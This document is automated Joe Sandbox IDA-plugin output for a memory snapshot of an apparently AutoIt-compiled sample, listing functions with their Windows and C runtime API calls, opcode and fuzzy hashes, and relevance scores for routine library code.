Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 29b24b071678827f992a98e329e67785fb40e0ee018d0b4dc4430d91ca3e2bff
Instruction ID: f780cc0f923338e4eba85e77c43e4e07d1db9c289d4d2dbefdc0c5c5d8e7dd65
Opcode Fuzzy Hash: 29b24b071678827f992a98e329e67785fb40e0ee018d0b4dc4430d91ca3e2bff
Instruction Fuzzy Hash: 08E05539B41208ABE720ABA1CC0AE3EBBE8EB54B51F40011DFE055B300DD706A0086EA

Uniqueness

Uniqueness Score: -1.00%

Function 012D3600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 012D3615

Strings

FlsAlloc, xrefs: 012D3604, 012D360E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 91e2cd813db36afe16784203c11bbc45c3636a0d33d49b27649e6be87257b00d
Instruction ID: 9ceb6da3060ce36973c6a8d2288e1642a2096ad7584f9f1d1e5d8f71f8534a59
Opcode Fuzzy Hash: 91e2cd813db36afe16784203c11bbc45c3636a0d33d49b27649e6be87257b00d
Instruction Fuzzy Hash: 7ED05B3278523467D7103A99FD06AAAFFCCEB45FB6F0C0065FF0C553009955651047D5

Uniqueness

Uniqueness Score: -1.00%

Function 012ECB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 012EC74F: GetOEMCP.KERNEL32(00000000), ref: 012EC77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,012ECA1D,?,00000000), ref: 012ECBF0
GetCPInfo.KERNEL32(00000000,012ECA1D,?,?,?,012ECA1D,?,00000000), ref: 012ECC03

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f1d3f55b7b785b842bd95ec0beb6728232ec95be79ff971a3dbf2ecc9e92f521
Instruction ID: 64d5e6af9d9406eafc0bb6c680ec17dd6468bf49bcf5a2bd615d8a6f8a49a39e
Opcode Fuzzy Hash: f1d3f55b7b785b842bd95ec0beb6728232ec95be79ff971a3dbf2ecc9e92f521
Instruction Fuzzy Hash: DC516870A203078FEB358FF9C4886BABFE5EF41310F84506ED2968B151D77695228B90

Uniqueness

Uniqueness Score: -1.00%

Function 012EC9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 012E2D74: GetLastError.KERNEL32(?,?,012E5686,012F3CD6,?,00000000,?,012E5B6A,?,?,?,?,?,012DE6D1,?,01378A48), ref: 012E2D78
Part of subcall function 012E2D74: _free.LIBCMT ref: 012E2DAB
Part of subcall function 012E2D74: SetLastError.KERNEL32(00000000,?,?,?,?,012DE6D1,?,01378A48,00000010,012B4F4A,?,?,00000000,012F3CD6), ref: 012E2DEC
Part of subcall function 012E2D74: _abort.LIBCMT ref: 012E2DF2

Part of subcall function 012ECADA: _abort.LIBCMT ref: 012ECB0C
Part of subcall function 012ECADA: _free.LIBCMT ref: 012ECB40

Part of subcall function 012EC74F: GetOEMCP.KERNEL32(00000000), ref: 012EC77A

_free.LIBCMT ref: 012ECA33
_free.LIBCMT ref: 012ECA69

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 3ad937a7febcfddb89504484c686615ce17cdfcfb4f996d9214f493f0751d3c1
Instruction ID: 60125a5bf4656ebe7da2cffb12e3f136d5c357b0c972d6165db6f8b46eb49fbe
Opcode Fuzzy Hash: 3ad937a7febcfddb89504484c686615ce17cdfcfb4f996d9214f493f0751d3c1
Instruction Fuzzy Hash: 3A31C23191020AAFDB21EFECD448BAD7BF9EF41320FA10199EA059B391EB355D51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012E2FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,012B1129,00000000,00000000,00000000,?,012E328B,00000006,FlsSetValue,01352290,FlsSetValue,00000000,00000364,?,012E2E46,00000000), ref: 012E3037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 012E3044

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: e7ff068baeef5fc570d8966abf1bcf8f42b042cf71490104ebe9e1c1ac19ca05
Instruction ID: f7130bd6eeea4565cd79365307ddf296187788618dd61ea21437b9138e813a46
Opcode Fuzzy Hash: e7ff068baeef5fc570d8966abf1bcf8f42b042cf71490104ebe9e1c1ac19ca05
Instruction Fuzzy Hash: DE110A33A201229FEB36DE5DD84496A7FD5BB81761B464220FF15AB249D731EC01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 012B5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012B5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 012F4052

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 18c07a45a739fdeaa1d6d6ef771f575909c33e898ca5dfec3f0c4edf09968737
Instruction ID: 2a3d403ef5ce5f7aef77931143e7e3385002026752ab68dcc402d769dc777582
Opcode Fuzzy Hash: 18c07a45a739fdeaa1d6d6ef771f575909c33e898ca5dfec3f0c4edf09968737
Instruction Fuzzy Hash: B4018C30245226B6E3341A2ACC4EF977F98EF027B0F108214BBAC6E1E0CBB45454CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012D3414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 012D3600: try_get_function.LIBVCRUNTIME ref: 012D3615

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012D3432
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 012D343D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 99c577af95d4b7cab30db0946b51f639877ce1fc8abe8959d364a7211b1cc9a4
Instruction ID: 3d1fbc04e66e9d0e8fe910bc1b2b0b9f44dd1bee218eba175cc641059d89e4de
Opcode Fuzzy Hash: 99c577af95d4b7cab30db0946b51f639877ce1fc8abe8959d364a7211b1cc9a4
Instruction Fuzzy Hash: 7AD0A7FD534303589D16EBB9F8020691244B511A743A0525AD420853C1DF6880051157

Uniqueness

Uniqueness Score: -1.00%

Function 012B6E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,012B9879,?,?,?), ref: 012B6E33
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,012B9879,?,?,?), ref: 012B6E69

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 201eeadbb6cf119d4d62150ce0cc168979ab0e11254932d425e10fff46eed8fc
Instruction ID: 887b6d3c1238b3329fd299497e1a0ff5b657f97a0e0dbcf3079c024c63299b7d
Opcode Fuzzy Hash: 201eeadbb6cf119d4d62150ce0cc168979ab0e11254932d425e10fff46eed8fc
Instruction Fuzzy Hash: 2201DF713152017FEB286BA99D4AFBF7AADDB85740F00012EB206DA1D0E9A0AC008670

Uniqueness

Uniqueness Score: -1.00%

Function 012BB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 012BBB4E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 3fc92b3ec66cfade865f3e9b94cf2b1dc6ceb379dbc301f25af7f025e106abec
Instruction ID: 18738f47cc6e27842c33d04b4ebc50852dbb9a83658dc79969dc5c844c00b8c9
Opcode Fuzzy Hash: 3fc92b3ec66cfade865f3e9b94cf2b1dc6ceb379dbc301f25af7f025e106abec
Instruction Fuzzy Hash: AB32B134A1020ADFDB29CF58C8A4BBEBBF9EF44394F048059EA15AB291D774ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012B4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 012B4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 012B4E9C
Part of subcall function 012B4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,012B4EDD,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EAE
Part of subcall function 012B4E90: FreeLibrary.KERNEL32(00000000,?,?,012B4EDD,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EFD

Part of subcall function 012B4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 012B4E62
Part of subcall function 012B4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,012F3CDE,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4E74
Part of subcall function 012B4E59: FreeLibrary.KERNEL32(00000000,?,?,012F3CDE,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4E87

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: cb3da7e04193d17dec9e1997b3c4500964fdda62b7f28900ca42959dff119cb1
Instruction ID: 208da938637e4e1477208a417e340e5c7439bb1d3566c959177f380c50587f53
Opcode Fuzzy Hash: cb3da7e04193d17dec9e1997b3c4500964fdda62b7f28900ca42959dff119cb1
Instruction Fuzzy Hash: 0F110432620206ABDF10FF64DCC5BFD77A49F60794F10842DE243AB1C1EEB4AA049750

Uniqueness

Uniqueness Score: -1.00%

Function 012E8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 012E8440

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 898d7fa52356ff79f9fa27fbe5de15517cc350b4f5e7c0b5bbbc7e0f6e9eadb0
Instruction ID: c6b9d5bb314756e8d45a4d0a5be487b665da5f4b978854c5951a41a3f43d6985
Opcode Fuzzy Hash: 898d7fa52356ff79f9fa27fbe5de15517cc350b4f5e7c0b5bbbc7e0f6e9eadb0
Instruction Fuzzy Hash: 99112A7590420AAFCF16DF58E9449AE7BF9EF48314F104069FD08AB312D731DA11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 012B9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 012B9A9C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ef31a4eda05ca09c6cdad7063a76e06ea073bc9d1f9e5399b3dd68b87912806b
Instruction ID: f53aa8b0327e512cd2de2d4dfca665ce9532287dc107d4267b0c03e178dac2e6
Opcode Fuzzy Hash: ef31a4eda05ca09c6cdad7063a76e06ea073bc9d1f9e5399b3dd68b87912806b
Instruction Fuzzy Hash: F7113A712147059FEF208E19C4C1BA6BBE9EB447A8F04C42DEB9B86A50C771B985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012E5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 012E4C7D: RtlAllocateHeap.NTDLL(00000008,012B1129,00000000,?,012E2E29,00000001,00000364,?,?,?,012DF2DE,012E3863,01381444,?,012CFDF5,?), ref: 012E4CBE

_free.LIBCMT ref: 012E506C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 67f4a03207b8ca6efa4964756d140060c364172c7245d151e45a279ab82205ec
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: 4E014E762243055FE331CF69D84996AFFECFB89270FA5051DE184832C0E670A805C774

Uniqueness

Uniqueness Score: -1.00%

Function 012DE469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 012DE4BE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: aef56a2458441193c030c4726dd01ba6eb9d765877b912b4f9bb740058e4f53a
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: A901FC71930349FFDB24EFA4CD45BBEB7ECEB40224F51856EE4169B100D67199008760

Uniqueness

Uniqueness Score: -1.00%

Function 012DE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: 56ba1f753433a7aa2ef7c87cd72a28fd9fa704a45a970ddc6cdd57a9499e923e
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: 55F02832530E16DED7323A69CC08BBA37DC9F52334F120719E6259B1D0DB74E40286E5

Uniqueness

Uniqueness Score: -1.00%

Function 012E4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,012B1129,00000000,?,012E2E29,00000001,00000364,?,?,?,012DF2DE,012E3863,01381444,?,012CFDF5,?), ref: 012E4CBE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9252d95dccb6e5e38bd501bf3a2624376f0b07c6bdfa1ff150856e2559a58aaa
Instruction ID: ce973db6b029d09fde18614c6ac69824441117f11a0622bf7c17356b50834bb8
Opcode Fuzzy Hash: 9252d95dccb6e5e38bd501bf3a2624376f0b07c6bdfa1ff150856e2559a58aaa
Instruction Fuzzy Hash: B2F059312352A267EB213F66DC0DBAA3BCCAF512B0B446112EB0AE7590CA70D42183E0

Uniqueness

Uniqueness Score: -1.00%

Function 012E3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6,?,012B1129), ref: 012E3852

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20a8ba0cd322f49d8a5ecdf667667d4f9bf377ede2c4a302eb4fc6800b830eef
Instruction ID: bfe3f79c5a309e74f9c569799d33ec40109dd457aa8860dbeaed455f754a41ea
Opcode Fuzzy Hash: 20a8ba0cd322f49d8a5ecdf667667d4f9bf377ede2c4a302eb4fc6800b830eef
Instruction Fuzzy Hash: B7E0EC3213525667E731E66ADC0DB9A3AC9BB816B2F450121AE0593480CB60D80182D1

Uniqueness

Uniqueness Score: -1.00%

Function 012E4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 012E4D9C

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 334e04fd013d99349cedcc1ef318c8da7d254d2499ccdd244af0bf52cbbe03db
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 50E092361103069F8721DF6DD404AC2BBF8EF943603608529EA9ED3310D332E412CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4F6D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

